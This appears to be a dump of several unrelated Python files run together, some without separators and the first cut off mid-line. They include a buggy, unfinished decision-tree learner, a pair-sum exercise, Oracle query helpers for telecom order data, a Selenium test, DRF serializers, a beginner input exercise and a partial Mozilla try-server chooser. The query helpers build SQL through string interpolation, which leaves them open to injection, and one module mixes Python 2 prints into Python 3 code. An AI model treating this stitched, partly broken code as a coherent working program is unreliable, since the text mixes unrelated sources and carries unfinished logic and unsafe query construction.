        return self.nonlinear(embedded)
|
import pandas as pd
import numpy as np
import random as rd
# Column names excluded from attribute selection; 'Class' is the label
# column.  Reset at the start of buildTree() and grown during recursion.
illegal = ["Class"]
class decisionTree:
    """A class that represents a binary decision tree."""

    # NOTE(review): class-level attributes act as shared defaults; addNode()
    # rebinds leadingNode per instance, but nodeArray would be shared across
    # all instances if it were ever mutated.
    leadingNode = None
    nodeArray = []

    def addNode(self, node):
        # Install *node* as the root of the tree.
        self.leadingNode = node

    def printTree(self):
        """Print the tree in an indented '<attr> = <val> : [label]' format."""
        pipelines = 0
        zero = self.leadingNode.label + " = 0 :"
        # NOTE(review): the leafZero/leafOne flags are paired with
        # zeroNode/oneNode labels asymmetrically below — confirm intended.
        if self.leadingNode.leafZero and self.leadingNode.zeroNode.label == "Zero":
            zero += " 0"
            print(zero)
        elif self.leadingNode.leafOne and self.leadingNode.zeroNode.label == "One":
            zero += " 1"
            print(zero)
        else:
            print(zero)
            self.printTreeHelper(pipelines, self.leadingNode.zeroNode)
        one = self.leadingNode.label + " = 1 :"
        if self.leadingNode.leafZero and self.leadingNode.oneNode.label == "Zero":
            one += " 0"
            print(one)
        elif self.leadingNode.leafOne and self.leadingNode.oneNode.label == "One":
            one += " 1"
            print(one)
        else:
            print(one)
            self.printTreeHelper(pipelines, self.leadingNode.oneNode)

    def printTreeHelper(self, pipelines, n):
        # Recursive pretty-printer; *pipelines* is the current depth and
        # controls the number of "| " indent markers.
        pipelines += 1
        zero = ""
        one = ""
        for i in range(pipelines):
            zero += "| "
            one += "| "
        zero += n.label + " = 0 :"
        try:
            if n.leafZero:
                zero += " 0"
                print(zero)
            elif n.leafOne:
                zero += " 1"
                print(zero)
            else:
                print(zero)
                self.printTreeHelper(pipelines, n.zeroNode)
        except:
            0  # NOTE(review): bare except silently swallows missing-child errors
        try:
            one += n.label + " = 1 :"
            if n.leafZero:
                one += " 0"
                print(one)
            elif n.leafOne:
                one += " 1"
                print(one)
            if not n.leafZero or not n.leafOne:
                #print(one)
                self.printTreeHelper(pipelines, n.oneNode)
        except:
            1  # NOTE(review): bare except — same caveat as above

    def test(self, testingFileName):
        """Classify each row of the CSV *testingFileName* and return accuracy
        (fraction of rows whose predicted label equals the 'Class' column)."""
        correct = 0
        total = 0
        tf = pd.read_csv(testingFileName)
        classCol = tf[['Class']]
        for i, row in tf.iterrows():
            answer = -1  # stays -1 (always wrong) if the attribute is not 0/1
            if row[self.leadingNode.label] == 0:
                if self.leadingNode.leafZero:
                    # NOTE(review): answers 0 regardless of the leaf's label
                    # ("Zero"/"One") — confirm this matches the builder.
                    answer = 0
                else:
                    answer = self.testHelper(self.leadingNode.zeroNode, row)
            elif row[self.leadingNode.label] == 1:
                if self.leadingNode.leafOne:
                    answer = 1
                else:
                    answer = self.testHelper(self.leadingNode.oneNode, row)
            classAnswer = int(classCol.values[i])
            total += 1
            if(answer == classAnswer):
                correct += 1
        return correct/total

    def testHelper(self, n, row): #todo finish
        # Walk down the subtree rooted at *n* following the row's attribute
        # values; returns the branch value at the first leaf flag hit.
        if row[n.label] == 0:
            if n.leafZero:
                return 0
            else:
                return self.testHelper(n.zeroNode, row)
        elif row[n.label] == 1:
            if n.leafOne:
                return 1
            else:
                return self.testHelper(n.oneNode, row)
def postPruning(dt, l, k, valSet):
    """Randomized post-pruning skeleton (incomplete — see todos).

    NOTE(review): `dPrime = dt` aliases the tree instead of copying it, so
    any real pruning would mutate dt and dBest; also `rd.randint(1, n)` with
    n == 0 (as currently hard-coded) raises ValueError.  Confirm before use.
    """
    dBest = dt
    tBest = dBest.test(valSet)
    for i in range(l):
        dPrime = dt
        m = rd.randint(1, k)
        for j in range(m):
            n = 0 #todo n equals number of nonleaf nodes
            #todo order nodes for 1 to n
            p = rd.randint(1, n)
            #todo make node p a leaf based on the majority of data
        tPrime = dPrime.test(valSet)
        if tPrime > tBest:
            dBest = dPrime
    return dBest #todo should return the percentage along with the tree
def entropy(matches, mismatches):
    """Shannon entropy of a two-class split.

    Returns 0 for an empty split and NaN for a pure split (one count zero).
    buildTreeHelper relies on np.isnan(entropy(...)) to detect pure nodes,
    so the NaN result for pure splits is part of the contract.
    """
    total = matches + mismatches
    if total == 0:
        return 0
    if matches == 0 or mismatches == 0:
        # The original formula produced 0 * log2(0) -> NaN here (with a
        # numpy runtime warning); return NaN explicitly, without the warning.
        return float('nan')
    p = matches / total
    q = mismatches / total
    return -p * np.log2(p) - q * np.log2(q)
def varianceImpurity(zeroes, ones):
    """Variance impurity p0 * p1 of a two-class split (0 for an empty split)."""
    count = zeroes + ones
    if count == 0:
        return 0
    return (ones / count) * (zeroes / count)
class node:
    """Decision-tree node: tracks per-branch (0/1) match statistics for one
    attribute and computes entropy / variance-impurity information gain."""

    zeroNode = None       # child followed when the attribute is 0
    oneNode = None        # child followed when the attribute is 1
    label = None          # attribute (column) name
    leafZero = False      # the 0-branch terminates in a leaf
    leafOne = False       # the 1-branch terminates in a leaf
    zeroAnswer = -1
    oneAnswer = -1
    total = 0             # total examples counted at this node
    matches = 0           # attribute value equals the class label
    mismatches = 0
    matchesZero = 0
    matchesOne = 0
    mismatchesZero = 0
    mismatchesOne = 0

    def __init__(self, label):
        self.label = label

    def addMatchZero(self):
        """Count an example with attribute 0 whose class is also 0."""
        self.matchesZero += 1
        self.matches += 1
        self.total += 1

    def addMatchOne(self):
        """Count an example with attribute 1 whose class is also 1."""
        self.matchesOne += 1
        self.matches += 1
        self.total += 1

    def addMismatchZero(self):
        """Count an example with attribute 0 whose class is 1."""
        self.mismatches += 1
        self.mismatchesZero += 1
        self.total += 1

    def addMismatchOne(self):
        """Count an example with attribute 1 whose class is 0."""
        self.mismatches += 1
        self.mismatchesOne += 1
        self.total += 1

    def gain(self):
        """Entropy-based information gain of splitting on this attribute."""
        if self.total == 0:
            return 0
        ones = self.matchesOne + self.mismatchesOne
        zeroes = self.matchesZero + self.mismatchesZero
        parent = entropy(self.matchesOne + self.mismatchesZero,
                         self.matchesZero + self.mismatchesOne)
        return (parent
                - (ones / self.total) * entropy(self.matchesOne, self.mismatchesOne)
                - (zeroes / self.total) * entropy(self.mismatchesZero, self.matchesZero))

    def gainVI(self):
        """Variance-impurity-based gain of splitting on this attribute."""
        if self.total == 0:
            return 0
        ones = self.matchesOne + self.mismatchesOne
        zeroes = self.matchesZero + self.mismatchesZero
        parent = varianceImpurity(self.matchesOne + self.mismatchesZero,
                                  self.matchesZero + self.mismatchesOne)
        return (parent
                - (ones / self.total) * varianceImpurity(self.matchesOne, self.mismatchesOne)
                - (zeroes / self.total) * varianceImpurity(self.mismatchesZero, self.matchesZero))
def buildTree(trainingFileName, vOrE):
    """Build a decision tree from a CSV training file.

    Args:
        trainingFileName: path to a CSV with binary attribute columns and a
            binary 'Class' label column.
        vOrE: 'e' selects entropy (information gain) splitting; anything
            else selects variance-impurity splitting.
    Returns:
        A decisionTree rooted at the best first split.
    """
    global illegal
    illegal = ["Class"]  # reset the used-attribute list for a fresh build
    best = node("")
    tf = pd.read_csv(trainingFileName)
    classCol = tf[['Class']]
    # Score every unused attribute column against the class label.
    for key, value in tf.items():  # .iteritems() was removed in pandas 2.0
        if key not in illegal:
            i = 0
            n = node(key)
            for element in value:
                element = int(element)
                answer = int(classCol.values[i])
                if element == answer:
                    if element == 0:
                        n.addMatchZero()
                    else:
                        n.addMatchOne()
                else:
                    if element == 0:
                        n.addMismatchZero()
                    else:
                        n.addMismatchOne()
                i = i + 1
            if vOrE == "e":
                if best.label == "":
                    best = n
                if best.gain() < n.gain():
                    best = n
            else:
                if best.label == "":
                    best = n
                # BUG FIX: the variance-impurity branch previously compared
                # gain() instead of gainVI().
                if best.gainVI() < n.gainVI():
                    best = n
    illegal.append(best.label)
    print(illegal)
    print("root " + best.label)
    best, best.oneNode = buildTreeHelper(trainingFileName, vOrE, best, 1)
    try:
        print("on of " + best.label + " is " + best.oneNode.label)
    except:
        0  # child may be missing; the progress print is best-effort
    best, best.zeroNode = buildTreeHelper(trainingFileName, vOrE, best, 0)
    try:
        print("zn of " + best.label + " is " + best.zeroNode.label)
    except:
        0
    dt = decisionTree()
    dt.addNode(best)
    return dt
def buildTreeHelper(trainingFileName, vOrE, parent, zOrO):
    """Recursively grow the subtree under *parent*'s zOrO (0/1) branch.

    Re-reads the training CSV, scores each unused attribute over the rows
    where parent's attribute equals zOrO, and either attaches child subtrees
    or marks leaves.  Returns (parent, chosen_child).
    """
    global illegal
    best = node("best")  # sentinel label; replaced once any column scores higher
    n = node("")
    tf = pd.read_csv(trainingFileName)
    classCol = tf[['Class']]
    parentDF = tf[[parent.label]]
    for key, value in tf.items():  # .iteritems() was removed in pandas 2.0
        if key not in illegal:
            print(key)
            i = 0
            n = node(key)
            for element in value:
                element = int(element)
                answer = int(classCol.values[i])
                parentVal = int(parentDF.values[i])
                # Only count rows that fall into this branch of the parent.
                if parentVal == zOrO:
                    if element == answer:
                        if element == 0:
                            n.addMatchZero()
                        else:
                            n.addMatchOne()
                    else:
                        if element == 0:
                            n.addMismatchZero()
                        else:
                            n.addMismatchOne()
                i = i + 1
            if vOrE == "e":
                if best.label == "":
                    best = n
                if best.gain() < n.gain():
                    best = n
            else:
                if best.label == "":
                    best = n
                # BUG FIX: the variance-impurity branch previously compared
                # gain() instead of gainVI().
                if best.gainVI() < n.gainVI():
                    best = n
    if best.label == "best":
        # No attribute improved on the sentinel: make the parent's branch a
        # leaf labeled with that branch's majority class.
        if zOrO == 1:
            parent.leafOne = True
            if parent.matchesOne > parent.mismatchesOne:
                child = node("One")
            else:
                child = node("Zero")
        else:
            parent.leafZero = True
            if parent.matchesZero > parent.mismatchesZero:
                child = node("Zero")
            else:
                child = node("One")
        return parent, child
    modified = False
    # A NaN entropy signals a pure split (see entropy()); mark leaves.
    if np.isnan(entropy(best.matchesOne, best.mismatchesOne)):
        best.leafOne = True
        if best.matchesOne > best.mismatchesOne:
            best.oneNode = node("One")
        else:
            best.oneNode = node("Zero")
        modified = True
    if np.isnan(entropy(best.matchesZero, best.mismatchesZero)):
        best.leafZero = True
        if best.matchesZero > best.mismatchesZero:
            best.zeroNode = node("Zero")
        else:
            best.zeroNode = node("One")
        modified = True
    if modified:
        print("return modified")
        return parent, best
    illegal.append(best.label)
    print(illegal)
    if len(illegal) >= 20:
        # Attribute cap reached: force a leaf.
        # NOTE(review): both branches assign best.oneNode but set different
        # leaf flags (leafZero vs leafOne); the pairing looks suspicious —
        # behavior preserved, confirm intent before changing it.
        if best.matchesZero > best.matchesOne:
            best.oneNode = node("Zero")
            best.leafZero = True
        else:
            best.oneNode = node("One")
            best.leafOne = True
        print("return illegal")
        return parent, best
    best, best.oneNode = buildTreeHelper(trainingFileName, vOrE, best, 1)
    try:
        print("on of " + best.label + " is " + best.oneNode.label)
    except:
        0  # best-effort progress print
    best, best.zeroNode = buildTreeHelper(trainingFileName, vOrE, best, 0)
    try:
        print("zn of " + best.label + " is " + best.zeroNode.label)
    except:
        0
    print("return end")
    return parent, best
#todo figure out when something should be a leaf
#todo implement pruning
|
from itertools import combinations # 조합 모듈 이용하기
# 바로 set()을 선언하고 진행해도 되지만
# 프로그래머스 json iteralize 오류 때문에 list 위주로 풀이했다.
def solution(numbers):
    """Return the sorted, de-duplicated sums of every pair in *numbers*."""
    pair_sums = {a + b for a, b in combinations(numbers, 2)}
    return sorted(pair_sums)
#! /usr/bin/env python
# -*- coding:utf-8 -*-
__author__ = 'XT'
from time import strftime
import os, sys
import random
# Make the sibling "db_fixture" package importable by appending its path
# (relative to this file's grandparent directory) to sys.path.
base_dir = str(os.path.dirname(os.path.dirname(__file__)))
base_dir = base_dir.replace('\\', '/')
file_path = base_dir + "/db_fixture"
sys.path.append(file_path)
import mysql_db
from oracle_db import BD_oracle_API, BD_oracle_PZ, BD_oracle_TJ
# ==== read settings from the db_config.ini file ====
base_dir = str(os.path.dirname(os.path.dirname(__file__)))
base_dir = base_dir.replace('\\', '/')
file_path = base_dir + "/db_config.ini"
import configparser as cparser
cf = cparser.ConfigParser()
cf.read(file_path)
# Default ten-thousand number segment used by Standard_number.
tenthousand = cf.get("Standard_ten_thousand_number", "Section_No")
import logging
class Standard_number(BD_oracle_API):
    """Look up usable test data (service number, IMSI/ICCID pairs) for a
    given ten-thousand number segment from the dbvop schema."""

    def __init__(self, tenthousand_num=None):
        super(Standard_number, self).__init__()
        if tenthousand_num is None:
            # Fall back to the module-level value read from db_config.ini.
            global tenthousand
            self.tenthousand = tenthousand
        else:
            self.tenthousand = tenthousand_num

    def Svc_num(self):
        """Return one idle (status '10') service number in this segment."""
        # logging.debug('This is debug message self.tenthousand : %s' % self.tenthousand)
        sql = "select s.SVC_NUMBER from dbvop.svc_number s\
            where s.svc_number_status='10' and s.svc_number like '%s%%'\
            and rownum <=1" % self.tenthousand
        # logging.debug('This is debug message sql : %s' % sql)
        rep_sql = self.GetDatas_QueryDB(sql)
        return rep_sql

    def Im_Icd(self):
        """Return one (imsi, iccid) pair with IMSI status '20' and idle ICCID."""
        sql = "select i.imsi,ic.ICCID from dbvop.iccid ic\
            right JOIN dbvop.imsi i on i.ICCID_ID=ic.ICCID_ID and i.imsi_status='20' \
            and i.ten_thousand_segment = '%s' where ic.iccid_status='10'\
            and rownum <=1" % self.tenthousand
        rep_sql = self.GetDatas_QueryDB(sql)
        return rep_sql

    def White_Im_Icd(self):
        """Return a white-list (imsi, iccid) pair, both with status '10'."""
        sql_imsi = "select imsi from dbvop.imsi i \
            where i.imsi_status='10' and i.ten_thousand_segment='%s'and rownum <=1" % self.tenthousand
        rep_sql_imsi = self.GetDatas_QueryDB(sql_imsi)
        sql_iccid = "select to_char(ICCID) from dbvop.iccid ic where ic.iccid_status='10' \
            and usim_type=1 and ic.mvno_business_mark in (select i.MVNO_BUSINESS_MARK \
            from dbvop.imsi i where i.imsi_status='10' \
            and i.ten_thousand_segment='%s') and rownum <=1" % self.tenthousand
        rep_sql_iccid = self.GetDatas_QueryDB(sql_iccid)
        return rep_sql_imsi[0][0], rep_sql_iccid[0][0]
class Verifying_Point(BD_oracle_API):
    """Query helpers for verifying order/subscription data in the dbvop
    schema.  Most methods depend on Service_Order() having been called
    first, which caches service_order_id and mvno_user_id on the instance.
    """

    def __init__(self, timestamp):
        super(Verifying_Point, self).__init__()
        # timestamp format: 'YYYY-MM-DD hh24:mi:ss'
        self.timestamp = timestamp

    def Service_Order(self, mvno_service_order_no):
        """Look up a service order by MVNO order number; caches
        service_order_id / mvno_user_id for the other query methods."""
        sql = "select s.service_order_id,s.mvno_user_id,s.bss_service_order_no,s.service_order_status,\
            s.service_order_proc_status,to_char(s.service_order_lanch_time,'YYYY-MM-DD hh24:mi:ss' ),\
            to_char(s.service_order_accept_time,'YYYY-MM-DD hh24:mi:ss'), s.service_class_code,s.user_type \
            from dbvop.service_order s where mvno_service_order_no = '%s'" % mvno_service_order_no
        rep_sql = self.GetDatas_QueryDB(sql)
        if len(rep_sql) != 0:
            self.service_order_id = rep_sql[0][0]
            self.mvno_user_id = rep_sql[0][1]
        return rep_sql

    def order_service_inst(self):
        """Service-instance rows of the cached order (needs Service_Order)."""
        sql = "select SERVICE_INST, ACTION_TYPE, to_char(SERVICE_ORDER_LANCH_TIME,'YYYY-MM-DD hh24:mi:ss' )\
            from dbvop.order_service_inst osi \
            where osi.service_order_id='%s' order by SERVICE_INST " % (self.service_order_id)
        rep_sql = self.GetDatas_QueryDB(sql)
        return rep_sql

    def bss_order_service_inst(self):
        """BSS service-instance property rows of the cached order."""
        sql = "select s.property_key,s.prop_action_type,s.property_value, SERVICE_INST, ACTION_TYPE, to_char(SERVICE_ORDER_LANCH_TIME,'YYYY-MM-DD hh24:mi:ss' ) \
            from dbvop.bss_order_service_inst s \
            where s.service_order_id='%s'" % self.service_order_id
        rep_sql = self.GetDatas_QueryDB(sql)
        return rep_sql

    def order_prod_subscribe(self):
        """Product-subscription rows of the cached order."""
        sql = "select b.product_id,b.prod_action_type,b.mvno_business_mark, to_char(SERVICE_ORDER_LANCH_TIME,'YYYY-MM-DD hh24:mi:ss' ) \
            from dbvop.order_prod_subscribe b where b.service_order_id='%s' " % (self.service_order_id)
        rep_sql = self.GetDatas_QueryDB(sql)
        return rep_sql

    def order_discnt_subscribe(self):
        """Discount-subscription rows of the cached order."""
        sql = "select DISCNT_ACTION_TYPE, to_char(SERVICE_ORDER_LANCH_TIME,'YYYY-MM-DD hh24:mi:ss' ), DISCNT_ID\
            from dbvop.order_discnt_subscribe a \
            where a.service_order_id='%s' order by DISCNT_ID" % (self.service_order_id)
        rep_sql = self.GetDatas_QueryDB(sql)
        return rep_sql

    def service_order_back(self):
        """Push-status / feedback row of the cached order."""
        sql = "select s.service_order_push_status,s.feedback_result,\
            to_char(s.bss_svc_order_cplt_time,'yyyymmdd hh24miss') \
            from dbvop.service_order_back s \
            where s.service_order_id='%s'" % (self.service_order_id)
        rep_sql = self.GetDatas_QueryDB(sql)
        return rep_sql

    def service_inst_subscribe(self):
        """Service-instance subscriptions for the cached MVNO user."""
        sql = "select to_char(s.order_time,'yyyymmdd hh24miss'),s.service_inst_status,\
            s.service_class_code,s.last_mvno_service_order_no,SERVICE_INST \
            from dbvop.service_inst_subscribe s \
            where s.mvno_user_id='%s'" % (self.mvno_user_id)
        rep_sql = self.GetDatas_QueryDB(sql)
        return rep_sql

    def bss_inst_subscribe(self):
        """BSS instance-subscription properties for the cached MVNO user."""
        sql = "select b.property_key,b.property_value,SERVICE_INST,to_char(order_time,'yyyymmdd hh24miss') \
            from dbvop.bss_inst_subscribe b \
            where b.mvno_user_id='%s' " % (self.mvno_user_id)
        rep_sql = self.GetDatas_QueryDB(sql)
        return rep_sql

    def prod_subscribe(self):
        """Product subscriptions for the cached MVNO user."""
        sql = "select s.product_id,to_char(s.order_time,'yyyymmdd hh24miss'),\
            s.last_mvno_service_order_no,s.mvno_business_mark \
            from dbvop.prod_subscribe s where s.mvno_user_id='%s'" % (self.mvno_user_id)
        rep_sql = self.GetDatas_QueryDB(sql)
        return rep_sql

    def discnt_subscribe(self):
        """Discount subscriptions attached to the user's product subscription."""
        sql = "select DISCNT_ID, PROD_PACKAGE_ID from dbvop.discnt_subscribe where prod_subscribe_id=\
            (select PROD_SUBSCRIBE_ID from dbvop.prod_subscribe where mvno_user_id='%s' )\
            order by DISCNT_ID" % (self.mvno_user_id)
        rep_sql = self.GetDatas_QueryDB(sql)
        return rep_sql

    def life_Imsi(self):
        """IMSI lifecycle rows for the cached user."""
        sql = "select l.imsi,to_char(l.eff_date,'yyyymmdd hh24miss'),\
            l.eff_flag,l.mvno_business_mark,to_char(EXP_DATE,'yyyymmdd hh24miss') \
            from dbvop.life_imsi l where l.user_id='%s'" % (self.mvno_user_id)
        rep_sql = self.GetDatas_QueryDB(sql)
        return rep_sql

    def Info_User(self):
        """User info row (stop/create dates, validity, status, type)."""
        sql = "select to_char(i.stop_date,'YYYYMMDD HH24MISS'),\
            to_char(i.create_date,'yyyymmdd hh24miss'),VALID_FLAG,USER_STATUS,user_type\
            from dbvop.info_user i where i.user_id='%s'" % (self.mvno_user_id)
        rep_sql = self.GetDatas_QueryDB(sql)
        return rep_sql

    def Life_User_Product(self):
        """User-product lifecycle rows for the cached user."""
        sql = "select EFF_FLAG, to_char(EFF_DATE,'YYYYMMDD HH24MISS') ,\
            to_char(EXP_DATE,'YYYYMMDD HH24MISS'), to_char(CREATE_DATE,'YYYYMMDD HH24MISS')\
            from dbvop.Life_User_Product l \
            where l.user_id='%s'" % (self.mvno_user_id)
        rep_sql = self.GetDatas_QueryDB(sql)
        return rep_sql

    def LIFE_USER_PRODUCT_DISCT(self):
        """User-product-discount lifecycle rows for the cached user."""
        sql = "select EFF_FLAG, to_char(EFF_DATE,'YYYYMMDD HH24MISS') ,\
            to_char(EXP_DATE,'YYYYMMDD HH24MISS'), to_char(CREATE_DATE,'YYYYMMDD HH24MISS')\
            from dbvop.LIFE_USER_PRODUCT_DISCT s \
            where s.mvno_user_id='%s'" % (self.mvno_user_id)
        rep_sql = self.GetDatas_QueryDB(sql)
        return rep_sql

    def I_Mvno_User_A(self):
        """All columns of the i_mvno_user_a row for the cached user."""
        sql = "select * from dbvop.i_mvno_user_a i\
            where i.mvno_user_id='%s'" % (self.mvno_user_id)
        rep_sql = self.GetDatas_QueryDB(sql)
        return rep_sql

    def q_mvno_user_a(self):
        """Row count in q_mvno_user_a for the cached user."""
        sql = "select Count(1) from dbvop.q_mvno_user_a v \
            where v.mvno_user_id='%s'" % (self.mvno_user_id)
        rep_sql = self.GetDatas_QueryDB(sql)
        return rep_sql

    def q_mvno_user_b(self):
        """Row count in q_mvno_user_b for the cached user."""
        sql = "select Count(1) from dbvop.q_mvno_user_b v \
            where v.mvno_user_id='%s' " % (self.mvno_user_id)
        rep_sql = self.GetDatas_QueryDB(sql)
        return rep_sql

    def t_mvno_user(self):
        """Row count in t_mvno_user for the cached user."""
        sql = "select Count(1) from dbvop.t_mvno_user v \
            where v.mvno_user_id='%s'" % (self.mvno_user_id)
        rep_sql = self.GetDatas_QueryDB(sql)
        return rep_sql

    def t_mvno_user_a(self):
        """Row count in t_mvno_user_a for the cached user."""
        sql = "select Count(1) from dbvop.t_mvno_user_a v \
            where v.mvno_user_id='%s'" % (self.mvno_user_id)
        rep_sql = self.GetDatas_QueryDB(sql)
        return rep_sql

    def t_mvno_user_b(self):
        """Row count in t_mvno_user_b for the cached user."""
        sql = "select Count(1) from dbvop.t_mvno_user_b v \
            where v.mvno_user_id='%s'" % (self.mvno_user_id)
        rep_sql = self.GetDatas_QueryDB(sql)
        return rep_sql

    def life_mvno_user(self):
        """Row count in life_mvno_user for the cached user."""
        sql = "select Count(1) from dbvop.life_mvno_user v \
            where v.mvno_user_id='%s'" % (self.mvno_user_id)
        rep_sql = self.GetDatas_QueryDB(sql)
        return rep_sql

    def imsi(self, imsi):
        """Return the status of the given IMSI."""
        # BUG FIX: the format argument was the undefined name `ims`, which
        # raised NameError on every call; use the `imsi` parameter.
        sql = "select i.imsi_status from dbvop.imsi i where i.imsi='%s'" % (imsi)
        rep_sql = self.GetDatas_QueryDB(sql)
        return rep_sql

    def life_user(self, imsi):
        """User lifecycle row for the cached user (the *imsi* argument is
        unused; kept for backward compatibility of the signature)."""
        sql = "select l.user_status,l.user_type,l.valid_flag,l.service_class_code,\
            to_char(l.eff_date,'yyyymmdd hh24miss'),to_char(l.exp_date,'YYYYMMDD') \
            from dbvop.life_user l where l.mvno_user_id='%s'" % (self.mvno_user_id)
        rep_sql = self.GetDatas_QueryDB(sql)
        return rep_sql

    def BSS_order_no_mvno_mapping(self, bss_service_order_no):
        """Mapping row for a BSS service order number."""
        sql = "select to_char(b.service_order_lanch_time,'YYYY-MM-DD hh24:mi:ss'),\
            b.mvno_business_mark,b.bss_service_order_no_state \
            from dbvop.BSS_order_no_mvno_mapping b \
            where b.bss_service_order_no='%s'" % (bss_service_order_no)
        rep_sql = self.GetDatas_QueryDB(sql)
        return rep_sql

    def mvno_user(self):
        """MVNO user row (deal time, type, status) for the cached user."""
        sql = "select to_char(DEAL_TIME,'yyyymmdd hh24miss'), MVNO_USER_TYPE, MVNO_USER_STATUS\
            from dbvop.mvno_user where mvno_user_id='%s'" % (self.mvno_user_id)
        rep_sql = self.GetDatas_QueryDB(sql)
        return rep_sql

    def PAY_USER_REL(self):
        """Pay-user relation rows for the cached user."""
        sql = "select EFF_FLAG,to_char(EFF_DATE,'YYYYMMDD HH24MISS'),to_char(EXP_DATE,'YYYYMMDD HH24MISS')\
            from dbvop.PAY_USER_REL where user_id='%s'" % (self.mvno_user_id)
        rep_sql = self.GetDatas_QueryDB(sql)
        return rep_sql

    def Life_User_Type(self):
        """User-type history rows for the cached user."""
        sql = "select MVNO_USER_TYPE,to_char(BEGIN_TIME,'YYYYMMDD HH24MISS'),to_char(END_TIME,'YYYYMMDD HH24MISS')\
            from dbvop.LIFE_USER_TYPE where mvno_user_id='%s'" % (self.mvno_user_id)
        rep_sql = self.GetDatas_QueryDB(sql)
        return rep_sql
if __name__ == '__main__':
    # Smoke test (Python 2 print statements): query one idle service number,
    # an IMSI/ICCID pair, and a white-list pair for the default segment.
    # vp = Verifying_Point('YYYY-MM-DD hh24:mi:ss')
    # print vp.Service_Order('123123123123')
    # vp.close()
    Sn = Standard_number()
    print Sn.Svc_num()
    print Sn.Im_Icd()
    print Sn.White_Im_Icd()
    Sn.close()
from selenium.common.exceptions import NoSuchElementException
def test_add_to_cart_button_is_presence(browser):
    """Open a product page and assert the add-to-basket button is present.

    Uses the Selenium 4 ``find_element(by, value)`` API — the old
    ``find_element_by_css_selector`` helper methods were removed in
    Selenium 4.  The trailing 10-second sleep was a debugging artifact and
    has been removed so the test runs quickly.
    """
    browser.get('http://selenium1py.pythonanywhere.com/catalogue/coders-at-work_207/')
    try:
        browser.find_element('css selector', '.btn.btn-lg.btn-primary.btn-add-to-basket')
    except NoSuchElementException:
        raise AssertionError('Add-to-basket button was not found on the page')
|
from rest_framework import serializers
from film.models import origin
class originSerializers(serializers.ModelSerializer):
    """DRF serializer exposing every field of the film ``origin`` model."""
    class Meta:
        model = origin
        fields = '__all__'
class originOnSerializers(serializers.ModelSerializer):
    """DRF serializer exposing only the ``name`` field of ``origin``."""
    class Meta:
        model = origin
        fields = ['name']
|
from copy import copy
from client_states.default.device_event_serializer import \
DefaultDeviceEventSerializerState
from timeattendance.models import DeviceEventChangeRequestForCheck, DeviceEvent
class OmcDeviceEventSerializerState(DefaultDeviceEventSerializerState):
    """Serializer state that records an audit change-request whenever a
    device event is updated."""

    def update(self, instance, validated_data):
        """Apply the update, then log the old vs. new event for checking."""
        snapshot = copy(instance)
        updated = super().update(instance, validated_data)
        # Prefer the impersonated audit user from the session, falling back
        # to the real authenticated user.
        acting_user = self.request.session.get('audit_user', self.request.real_user)
        DeviceEventChangeRequestForCheck.objects.create_from_old_and_new_events(
            acting_user,
            snapshot,
            updated,
        )
        return updated
|
# Exercise: work with variables — create a few, print them, ask the user for
# some numbers and strings, store them in variables, and print them.
my_name = "Donald"
print(my_name)
my_age = 111
print(my_age)
print(float(my_age))
print(my_name, my_age)
name = input("Добрый день, введите пожалуйста своё имя: ")
print("Привет," + name)
city = input("Из какого вы города?: ")
print(f"Привет, {name}. Из города {city}.")
# BUG FIX: the age was previously compared as a string ("9" >= "18" is True
# lexicographically); convert to int so the comparison is numeric.
age = int(input("Сколько вам лет?: "))
if age >= 18:
    print("Вам больше 18")
else:
    print("Вам меньше 18")
#!/usr/bin/env python
"choose build options for and push to Mozilla's try server"
import sys
import re
import inspect
# A node in the decision tree
class N: # Node
    """A yes/no question in the decision tree.

    *prompt* is shown to the user, *help* is printed when they answer '?',
    and *action* is the trychooser flag text appended on a 'yes' answer.
    """
    def __init__ (self, prompt, help, action):
        self.prompt, self.help, self.action = prompt, help, action
# this deletes a character, then moves to the next option.
class D: # delete_command
    """Marker node: deletes the trailing character of the accumulated
    command string, then continues at *next*."""
    def __init__(self, next):
        self.next = next
class NoPrompt:
    """Node that appends *action* to the command string without asking the
    user anything; flow continues at its ``next`` attribute."""
    def __init__ (self, action):
        self.action = action
finish = object()  # terminal sentinel: the question sequence is complete
error = object()   # terminal sentinel: the selection is invalid
################
# Build each node with it's data
################
# Question nodes.  Prefixes: b_* build type, p_* platforms, u_* unit tests,
# t_* talos suites.  NoPrompt nodes emit flag text without asking.
a = N ("Run everything", "Run all platforms, tests and talos, and don't ask any more questions", ' -b do -p all -u all -t all')
b_od = N ("Both optimized and debug", "All builds and tests will run both on optimized and debug builds", ' -b do')
b_o = N ("Just optimized", "Only use optimized builds, do not use debug builds", ' -b o')
b_d = N ("Just debug", "Only use debug builds, do not use optimized builds", ' -b d')
p_all = N ("All platforms", "Build on all platforms", ' -p all')
p_any = NoPrompt (" -p ")
p_linux = N ("Linux", "Build on i386 (32-bit) linux", 'linux,')
p_linux64 = N ("linux64", "Build on x86-64 (64-bit) linux", 'linux64,')
p_macosx64 = N ("macosx64", "Build on Mac OSX 10.6 (x86-64, 64-bit, part of a universal binary)", 'macosx64,')
p_win32 = N ("win32", "Build on Windows (32-bit)", 'win32,')
p_win64 = N ("win64", "Build on Windows (64-bit)", 'win64,')
p_android = N ("android", "Build on Android", 'android,')
p_android_armv6 = N ("android-armv6", "Build on Android Armv6", 'android-armv6,')
p_android_noion = N ("android-noion", "Build on Android without IonMonkey", 'android-noion,')
p_emulator = N ("emulator", "Build on the B2G emulator ICS", 'emulator,')
p_emulator_jb = N ("emulator-jb", "Build on the B2G emulator JB", 'emulator-jb,')
p_emulator_kk = N ("emulator-kk", "Build on the B2G emulator KK", 'emulator-kk,')
p_none = NoPrompt (" -p none")
u_all = N ("All Unit tests", "Run all unit tests on all chosen platforms", ' -u all')
u_any = N ("Any unit tests", "Would you like to be asked about running each set of unit tests", ' -u ')
u_reftest = N ("reftest", "Run reftests", 'reftest,')
u_reftest_ipc = N ("reftest-ipc", "Run IPC reftests", 'reftest-ipc,')
u_reftest_naccel = N ("reftest-no-accel", "Run non-accelerated reftests (linux/win7 only)", 'reftest-no-accel,')
u_crashtest = N ("crashtest", "Run crashtest tests", 'crashtest,')
u_crashtest_ipc = N ("crashtest-ipc", "Run IPC crashtests", 'crashtest-ipc,')
u_xpcshell = N ("xpcshell", "Run xpcshell tests", 'xpcshell,')
u_jsreftest = N ("jsreftest", "Run jsreftests", 'jsreftest,')
u_jetpack = N ("jetpack", "Run jetpack tests", 'jetpack,')
u_marionette = N ("marionette", "Run marionette tests", 'marionette,')
u_mozmill = N ("mozmill", "Run mozmill tests (thunderbird-only)", 'mozmill,')
u_mochitests = N ("Run all mochitests", "Run all of the mochitests", 'mochitests,')
